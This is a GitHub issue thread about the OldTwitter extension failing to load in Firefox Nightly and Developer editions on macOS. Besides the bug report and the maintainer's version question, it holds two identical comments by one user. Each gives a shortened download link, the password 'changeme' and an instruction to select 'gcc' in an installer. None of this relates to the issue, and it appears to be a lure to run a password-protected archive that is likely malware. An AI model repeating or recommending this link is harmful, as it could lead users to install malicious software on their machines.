### ISSUE TITLE
Extension does not load in Firefox

### ISSUE THREAD

**Issue by ozzyjr** [dimdenGD/OldTwitter#919]
Extension does not load in Firefox Nigthly 131.0a1 (2024-08-27) (64-bits) and Developer 130.0b9 (64-bits), and remains on the white screen with the blue bird.

In Chrome it works normally

**Screenshots**
![oldtwitter](https://github.com/user-attachments/assets/e257a34b-ded2-4f6c-95db-03795ccce39a)

**Browser**
Firefox Nigthly 131.0a1 (2024-08-27) (64-bits) and Developer 130.0b9 (64-bits)
MacOs Sonoma 14.6.1 (Intel)

**Console Log**
[oldtwitter.txt](https://github.com/user-attachments/files/16766211/oldtwitter.txt)

**Comment by dimdenGD** [comment]
what version

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ozzyjr** [comment]
1.8.7.3

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
